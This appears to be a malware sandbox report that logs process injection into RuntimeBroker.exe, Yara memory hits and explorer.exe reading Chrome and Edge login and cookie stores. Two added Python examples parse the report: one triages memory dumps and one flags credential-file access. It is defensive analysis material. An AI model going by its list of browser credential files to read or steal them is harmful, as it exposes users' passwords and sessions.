Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 491CC81000 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy |
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: unknown base: 7FF802BC1580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe |
Memory protected: unknown base: 7FF802BC1580 protect: page execute read |
Source: C:\Windows\explorer.exe |
Memory protected: unknown base: 7FF802BC1580 protect: page execute and read and write |
Source: Yara match |
File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
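A triage helper for the Yara-match list above, added here as an example; it is not part of the report and not the sandbox vendor's tooling. It decodes the dotted `.sdmp` identifiers on the assumption that the fields are `<process index>.<dump phase>.<dump id>.<base address>.<page protection>.<unknown>.<region type>.<unknown>`; only the protection and region-type fields are interpreted, because their values (0x40, 0x04, 0x20000, 0x40000) line up with the `PAGE_*` and `MEM_*` constants from winnt.h. The field layout itself is an assumption, the Windows constants are not. The sample input is copied from the lines above.

```python
"""Triage of sandbox Yara hits (added example; not part of the report or of the
sandbox vendor's tooling).  A '.sdmp' identifier such as
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000
is decoded on the ASSUMPTION that its dotted fields are
  <process index>.<dump phase>.<dump id>.<base address>.<page protection>.<unknown>.<region type>.<unknown>
Only the protection and region-type fields are interpreted (their values match the
Windows PAGE_* / MEM_* constants); the other fields are carried through untouched."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Windows constants (winnt.h); these are real values, not assumptions.
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
REGION_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

SDMP_RE = re.compile(r"File source: ((?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp, type: MEMORY")
MEMSTR_RE = re.compile(r"File source: Process Memory Space: (\S+) PID: (\d+), type: MEMORYSTR")
UNPACKED_RE = re.compile(r"File source: \S+\.unpack, type: UNPACKEDPE")


@dataclass(frozen=True)
class MemHit:
    proc_index: int   # first field, hex (assumed: the report's process index)
    base: int         # fourth field, hex base address of the dumped region
    protect: int      # fifth field, Windows page protection
    region_type: int  # seventh field, Windows region type

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable_executable(self) -> bool:
        # A Yara hit inside RWX (or WCX) memory is the classic injected-payload signal.
        return self.protect in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)

    @property
    def region_name(self) -> str:
        return REGION_NAMES.get(self.region_type, f"0x{self.region_type:x}")


def parse_sdmp(ident: str) -> MemHit:
    f = ident.split(".")
    return MemHit(int(f[0], 16), int(f[3], 16), int(f[4], 16), int(f[6], 16))


def triage(lines):
    """Group Yara hits by process index and split RWX regions from the rest.
    Several snapshots of one region collapse to a single base address."""
    rwx, other = defaultdict(set), defaultdict(set)
    memstr, unpacked = [], 0
    for line in lines:
        m = SDMP_RE.search(line)
        if m:
            hit = parse_sdmp(m.group(1))
            (rwx if hit.writable_executable else other)[hit.proc_index].add(hit.base)
            continue
        m = MEMSTR_RE.search(line)
        if m:
            proc = (m.group(1), int(m.group(2)))
            if proc not in memstr:
                memstr.append(proc)
            continue
        if UNPACKED_RE.search(line):
            unpacked += 1
    return {
        "rwx_regions": {k: sorted(v) for k, v in rwx.items()},
        "other_regions": {k: sorted(v) for k, v in other.items()},
        "memstr_processes": memstr,
        "unpacked_pe": unpacked,
    }


# Lines copied from the report; the trailing ' |' is the page's table residue.
SAMPLE_REPORT = """\
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
"""

if __name__ == "__main__":
    result = triage(SAMPLE_REPORT.splitlines())
    for idx, bases in result["rwx_regions"].items():
        print(f"process {idx:#x}: RWX Yara hit(s) at", ", ".join(f"{b:#x}" for b in bases))
    print("string-only hits:", result["memstr_processes"], "unpacked PEs:", result["unpacked_pe"])
```

Run against the full list above, the helper separates the hits in RWX regions of process indexes 0x18, 0x24, 0x25, 0x2D and 0x31 (the `control.exe`, `RuntimeBroker.exe` and `rundll32.exe` children) from the read-write heap snapshots of process 0x02, which is the distinction an analyst wants when deciding which memory dumps to pull for the injected payload.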
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002 |
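The events above show `explorer.exe`, a process that has no business reading browser profiles, opening the Chrome and Edge `login data` and `cookies` stores. The following detection logic, added here as an example and not part of the report, consumes the report's own two-line `Source:` / `File opened:` format and flags any process other than the owning browser that opens a credential file. The browser-to-process table and the list of credential files are assumptions based on default Chrome, Edge and Firefox profile layouts (Firefox is included as a generalisation beyond what the report shows); the last two sample events are constructed controls, the first four are copied from the report.

```python
"""Detection example (added here, not part of the report): flag processes other
than the owning browser that open browser credential stores, fed with the
report's own 'Source: <process>' / 'File opened: <path>' event pairs.  The
browser-to-process table and the list of credential files are assumptions based
on default Chrome, Edge and Firefox profile layouts; they are not from the report."""
import ntpath
import re

# Profile-directory marker -> process that legitimately owns it (assumed, default installs)
BROWSER_OWNERS = {
    "\\google\\chrome\\user data\\": "chrome.exe",
    "\\microsoft\\edge\\user data\\": "msedge.exe",
    "\\mozilla\\firefox\\profiles\\": "firefox.exe",
}
# Files holding saved credentials, cookies, or the key that protects them (assumed list)
CREDENTIAL_FILES = {
    "login data", "login data for account", "cookies", "web data", "local state",  # Chromium
    "logins.json", "key4.db", "cookies.sqlite",                                    # Firefox
}
SOURCE_RE = re.compile(r"^Source:\s+(.+?)\s*\|?\s*$")
OPENED_RE = re.compile(r"^File opened:\s+(.+?)\s*\|?\s*$")


def pair_events(lines):
    """Yield (process_path, file_path) from the alternating two-line event format."""
    current = None
    for raw in lines:
        line = raw.strip()
        m = SOURCE_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = OPENED_RE.match(line)
        if m and current:
            yield current, m.group(1)


def owning_browser(path_lower):
    for marker, owner in BROWSER_OWNERS.items():
        if marker in path_lower:
            return owner
    return None


def flag_credential_access(lines):
    """Return (actor, owner, file) triples where a non-owner process opened a
    credential file.  Cache files under the same profile are ignored: reading
    them is noisy and is not the signal this rule is after."""
    findings = []
    for proc, path in pair_events(lines):
        p = path.lower().replace("/", "\\")   # Windows paths are case-insensitive
        owner = owning_browser(p)
        if owner is None:
            continue
        filename = ntpath.basename(p)
        if filename not in CREDENTIAL_FILES:
            continue
        actor = ntpath.basename(proc.lower())
        if actor != owner:
            findings.append((actor, owner, filename))
    return findings


# First four events copied from the report; the last two are constructed controls.
SAMPLE_EVENTS = """\
Source: C:\\Windows\\explorer.exe |
File opened: C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\cache\\f_000008 |
Source: C:\\Windows\\explorer.exe |
File opened: C:\\Users\\user\\appdata\\local\\google\\chrome\\user data\\default\\login data |
Source: C:\\Windows\\explorer.exe |
File opened: C:\\Users\\user\\appData\\local\\microsoft\\edge\\user data\\default\\login data |
Source: C:\\Windows\\explorer.exe |
File opened: C:\\Users\\user\\appdata\\local\\google\\chrome\\user data\\default\\cookies |
Source: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe |
File opened: C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data |
Source: C:\\Windows\\explorer.exe |
File opened: C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\abcd1234.default\\key4.db |
"""

if __name__ == "__main__":
    for actor, owner, filename in flag_credential_access(SAMPLE_EVENTS.splitlines()):
        print(f"ALERT: {actor} opened {owner} credential file '{filename}'")
```

The cache reads (`f_00000x`, `data_0`, `index`) are deliberately not alerted on: browsers, indexers and backup agents touch those constantly, whereas `Login Data`, `Cookies` and `Local State` (which holds the DPAPI-protected key for Chromium's encrypted passwords) are read by the browser itself and by credential stealers, and very little else. The same logic ports directly to Sysmon Event ID 11/23 or EDR file-access telemetry by swapping the two regexes for the event's process and target-path fields.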
Source: Yara match |
File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |